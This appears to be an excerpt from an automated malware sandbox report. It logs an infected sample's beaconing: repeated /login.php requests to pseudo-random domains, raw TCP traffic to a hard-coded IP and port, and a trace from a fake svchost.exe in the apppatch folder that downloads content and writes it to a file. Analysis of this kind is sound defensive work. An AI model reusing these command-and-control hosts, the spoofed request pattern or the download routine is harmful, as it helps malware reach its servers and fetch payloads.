      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qexyhuv.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyhyg.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lygyvuj.comContent-Length: 6Cookie: btst=230ba644e827e5eb69b76dd744835699|8.46.123.33|1724431667|1724431667|0|1|0; snkz=8.46.123.33Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyhiz.comContent-Length: 6Cookie: btst=61afe5b7d011093f87c495eec767f391|8.46.123.33|1724431669|1724431669|0|1|0; snkz=8.46.123.33Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.comContent-Length: 6Cookie: btst=aa122ab46703e7e3b9d2518b0ebc8c78|8.46.123.33|1724431671|1724431621|25|2|0; snkz=8.46.123.33Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.comContent-Length: 6Cookie: btst=ee59b14dfaa9c8907c706ea22e956ef8|8.46.123.33|1724431672|1724431621|25|2|0; snkz=8.46.123.33Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.comContent-Length: 6Cookie: vsid=926vr471977221402211128Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.comContent-Length: 6Cookie: btst=3e0cadd8e2dc2fdcf92b9c2073c70c58|8.46.123.33|1724431671|1724431621|25|2|0; snkz=8.46.123.33Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.comContent-Length: 6Cookie: btst=162891e75d1d854fb9d05e52998b5935|8.46.123.33|1724431672|1724431621|25|2|0; snkz=8.46.123.33Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyfyj.comContent-Length: 6Cookie: sid=5243bebf-616f-11ef-adb1-e1f00ce9ce88Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: www.gahyqah.comConnection: Keep-AliveData Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: unknownTCP traffic detected without corresponding DNS query: 106.15.137.66
      Source: unknownTCP traffic detected without corresponding DNS query: 106.15.137.66
      Source: unknownTCP traffic detected without corresponding DNS query: 106.15.137.66
      Source: unknownTCP traffic detected without corresponding DNS query: 106.15.137.66
      Source: unknownTCP traffic detected without corresponding DNS query: 106.15.137.66
      Source: unknownTCP traffic detected without corresponding DNS query: 106.15.137.66
      Source: unknownTCP traffic detected without corresponding DNS query: 106.15.137.66
      Source: unknownTCP traffic detected without corresponding DNS query: 106.15.137.66
      Source: unknownTCP traffic detected without corresponding DNS query: 106.15.137.66
      Source: unknownTCP traffic detected without corresponding DNS query: 106.15.137.66
      Source: unknownTCP traffic detected without corresponding DNS query: 106.15.137.66
      Source: unknownTCP traffic detected without corresponding DNS query: 106.15.137.66
      Source: unknownTCP traffic detected without corresponding DNS query: 106.15.137.66
      Source: unknownTCP traffic detected without corresponding DNS query: 106.15.137.66
      Source: unknownTCP traffic detected without corresponding DNS query: 106.15.137.66
      Source: unknownTCP traffic detected without corresponding DNS query: 106.15.137.66
      Source: unknownTCP traffic detected without corresponding DNS query: 106.15.137.66
      Source: unknownTCP traffic detected without corresponding DNS query: 106.15.137.66
      Source: unknownTCP traffic detected without corresponding DNS query: 106.15.137.66
      Source: unknownTCP traffic detected without corresponding DNS query: 106.15.137.66
      Source: unknownTCP traffic detected without corresponding DNS query: 106.15.137.66
      Source: unknownTCP traffic detected without corresponding DNS query: 106.15.137.66
      Source: unknownTCP traffic detected without corresponding DNS query: 106.15.137.66
      Source: unknownTCP traffic detected without corresponding DNS query: 106.15.137.66
      Source: unknownTCP traffic detected without corresponding DNS query: 106.15.137.66
      Source: unknownTCP traffic detected without corresponding DNS query: 106.15.137.66
      Source: unknownTCP traffic detected without corresponding DNS query: 106.15.137.66
      Source: unknownTCP traffic detected without corresponding DNS query: 106.15.137.66
      Source: unknownTCP traffic detected without corresponding DNS query: 106.15.137.66
      Source: unknownTCP traffic detected without corresponding DNS query: 106.15.137.66
      Source: unknownTCP traffic detected without corresponding DNS query: 106.15.137.66
      Source: unknownTCP traffic detected without corresponding DNS query: 106.15.137.66
      Source: unknownTCP traffic detected without corresponding DNS query: 106.15.137.66
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D34680 memset,GetProcessHeap,HeapAlloc,memset,memcpy,InternetOpenA,InternetConnectA,HttpOpenRequestA,HttpAddRequestHeadersA,HttpAddRequestHeadersA,HttpAddRequestHeadersA,_snprintf,HttpAddRequestHeadersA,HttpSendRequestA,HttpQueryInfoA,CreateFileA,GetProcessHeap,GetProcessHeap,HeapAlloc,memset,InternetReadFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetHandleInformation,CloseHandle,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,1_2_02D34680
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyfyj.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: www.gahyqah.comConnection: Keep-AliveData Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww3.galyqaz.comConnection: Keep-AliveCookie: vsid=926vr471977221402211128Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupydeq.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupycag.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /dh/147287063_637385.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.137.66:8001Connection: Keep-AliveData Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
